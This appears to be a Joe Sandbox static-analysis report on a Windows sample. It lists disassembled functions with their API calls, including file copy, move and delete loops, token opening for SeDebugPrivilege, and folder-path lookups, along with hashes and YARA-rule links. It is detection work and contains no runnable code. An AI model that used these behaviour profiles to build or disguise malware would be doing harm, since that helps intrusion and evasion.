                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BD94
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0044BE71
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE83
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BE95
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2188072990-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 999945258-2428617273
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00464EAE Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 193threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443D19: _wcslen.LIBCMT ref: 00443D34
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464F2A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00464F40
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00464F54
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00464F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00464F6C
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00464F73
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4ccb8eda33b7606bc70f55622b8c9345a385014adf55ef82b2f5723e997a33b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6ee098d93b5c3ece286c9d7df0f89eb4f2932b8b97d60c134c5a8e1830bdbe8f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ccb8eda33b7606bc70f55622b8c9345a385014adf55ef82b2f5723e997a33b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1519372204301AFE710EF64DC85F6BB7E8AB84705F10491EFA44DB2C1D7B5E8058BAA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                                                                                                                                                                                                                                                                                • _, xrefs: 0040371C
                                                                                                                                                                                                                                                                                                                                                                                                                                • Error opening the file, xrefs: 00428231
                                                                                                                                                                                                                                                                                                                                                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3393021363-188983378
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2192556992-3457252023
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
